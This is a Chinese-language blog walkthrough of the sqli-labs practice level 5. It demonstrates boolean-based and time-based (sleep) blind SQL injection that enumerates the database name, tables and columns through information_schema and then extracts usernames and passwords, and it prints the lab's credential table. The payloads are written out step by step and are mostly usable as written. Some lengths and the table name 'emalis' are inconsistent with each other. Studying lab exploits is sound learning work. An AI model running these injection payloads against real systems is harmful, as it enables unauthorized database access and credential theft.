基于时间的 SQL 盲注-延时判断和基于布尔的 SQL 盲注

sqli-maps第五关

先尝试bool盲注实在不行才会尝试时间盲注

1.先尝试页面是否正常显示

id=1' and 1=1

id=1' and 1=2

发现了异常

2.然后判断列数

id=1' order by 3

3.然后判断数据库的类型和数据库的名字

显示判断数据库的类型:and length(@@version)>0 --+ 页面正常显示就是mysql

然后对于数据库的名字就要开始尝试:

先对数据库的名字长度开始尝试:id=1 and length(database())>5逐步尝试,然后最终确定了:id=1 and length(database())>9 此时出现了页面的错误就是说明数据库的长度是8位

然后再对数据库的名字开始尝试:

数据库的名字可能是不同的符号,数字,字母什么的就是用ascii码来转换一下,统一转换成数字

先判断数据库名字第一个是啥and ascii(substr(database(),1,1))>100 --+来确定一下范围,如果页面正常就扩大或者缩小一定的范围

-- 先确定大致范围

id=1' and ascii(substr(database(),1,1))>100 --+ → 正常(说明>100)

id=1 'and ascii(substr(database(),1,1))>64 --+ → 正常(说明>64,可能是字母)

-- 二分法精确搜索

id=1' and ascii(substr(database(),1,1))>96 --+ → 正常(说明>96,小写字母)

id=1' and ascii(substr(database(),1,1))>109 --+ → 正常(说明>109,在110-122之间)

id=1' and ascii(substr(database(),1,1))>115 --+ → 异常(说明<=115,在110-115之间)

id=1' and ascii(substr(database(),1,1))>112 --+ → 正常(说明>112,在113-115之间)

-- 精确确定

id=1' and ascii(substr(database(),1,1))=113 --+ → 异常

id=1' and ascii(substr(database(),1,1))=114 --+ → 异常

id=1' and ascii(substr(database(),1,1))=115 --+ → 正常

最终确定第一位:ASCII 115 = 's'

尝试八次就能得到数据库的名字是security

4.从security数据库里面得到相应的表的信息:

表名提取

-- 1. 表数量

id=1' and (select count(*) from information_schema.tables where table_schema='security')=5 --+(发现页面的错误)

id=1' and (select count(*) from information_schema.tables where table_schema='security')=4 --+(发现页面正常)

表有四个

-- 2. 逐位获取第一个表名

第一步:获取第一个表名的长度

-- 先用范围判断长度

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>5 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>10 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))>8 --+

id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=7 --+(出现异常)

说明第一个表的长度是6

第二步:逐位提取第一个表名的字符(跟猜数据库的步骤类似大写字母,小写字母,字母分界线先来测试范围)

假设第一个表名长度是5个字符:

第1位字符:

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>64 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>96 --+

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>109 --+

-- 使用二分法精确确定

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 --+ -- 'e'

逐次爆破得到第一个表是emalis

最终可以得到所有的表是:emails,referers,uagents,users

然后重复上述操作为的是得到后面需要的用户名和密码

5.得到列的数据

字段提取

用上面的方法再次操作

-- 测试ASCII范围

-- 二分法精确确定

-- 最终确定

-- 1.

id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() limit 0,1),1,1))=105--+

可以将users下的列名全部得出,为id,username,password

6.数据提取

用上面的方法再次操作

-- 1. 提取用户名

id=1' and ascii(substr((select username from users limit 0,1),1,1))=68 --+

依次提取第一个用户是 :Dumb

-- 2. 提取密码

id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+

依次提取第一个密码是:Dumb

+----+----------+------------+

| id | username | password |

+----+----------+------------+

| 1 | Dumb | Dumb |

| 2 | Angelina | I-kill-you |

| 3 | Dummy | p@ssword |

| 4 | secure | crappy |

| 5 | stupid | stupidity |

| 6 | superman | genious |

| 7 | batman | mob!le |

| 8 | admin | admin |

| 9 | admin1 | admin1 |

| 10 | admin2 | admin2 |

| 11 | admin3 | admin3 |

| 12 | dhakkan | dumbo |

| 14 | admin4 | admin4 |

+----+----------+------------+

如果要时间盲注只需要加上if和sleep的条件就行:

比如最后的id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+只需要改成:

id=1' and if(ascii(substr((select password from users limit 0,1),1,1))=68,sleep(5),0)--+

相关推荐
Wave8451 分钟前
非阻塞按键(单击,双击,长按)
数据库
2401_831824967 分钟前
为你的Python脚本添加图形界面(GUI)
jvm·数据库·python
久违的太阳8 分钟前
记录一次ORACLE RAC安装PSU补丁步骤
数据库·oracle
2401_879693879 分钟前
用Pygame开发你的第一个小游戏
jvm·数据库·python
xushichao198918 分钟前
实战:用OpenCV和Python进行人脸识别
jvm·数据库·python
sthnyph31 分钟前
初识MySQL · 库的操作
数据库·mysql
原来是猿31 分钟前
MySQL【视图】
数据库·mysql
2401_873587821 小时前
MySQL——事务管理
数据库·mysql
探索宇宙真理.1 小时前
SiYuan SQL漏洞 | CVE-2026-29073复现&研究
数据库·经验分享·sql·eureka·安全漏洞·siyuan
2501_945423541 小时前
工具、测试与部署
jvm·数据库·python